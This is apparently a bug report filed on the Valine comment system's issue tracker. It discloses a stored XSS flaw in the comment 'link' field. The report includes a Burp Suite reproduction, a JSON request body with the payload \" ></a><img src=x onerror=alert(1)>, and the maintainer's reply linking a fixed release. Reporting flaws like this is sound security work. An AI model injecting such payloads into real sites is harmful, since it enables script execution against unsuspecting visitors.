评论链接存在XSS漏洞

[Cl0udG0d]

评论链接存在XSS漏洞

如果您想报告错误，请提供以下信息 If you want to report a bug, please provide the following information:

• 可复现问题的步骤 The steps to reproduce.
  使用burpsuite提交评论并抓包
  
  poc:

{"comment":"1\n","nick":"test","mail":"[email protected]","link":"\" ></a><img src=x onerror=alert(1)>","ua":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0","url":"/faq.html","QQAvatar":"","ip":"2406:da14:727:6700:2746:774b:2b87:6dbe","insertedAt":{"__type":"Date","iso":"2021-06-03T15:59:08.981Z"},"ACL":{"*":{"read":true}}}

核心payload为comment内容：
\" ></a><img src=x onerror=alert(1)>
其效果为：
https://valine.js.org/faq.html

• 可复现问题的网页地址 A minimal demo of the problem via https://jsfiddle.net or http://codepen.io/pen if possible.
  https://valine.js.org/faq.html 记得删除评论
• 受影响的Valine版本、操作系统，以及浏览器信息 Which versions of Valine, and which browser / OS are affected by this issue?

[xCss]

https://github.com/xCss/Valine/releases/tag/v1.4.15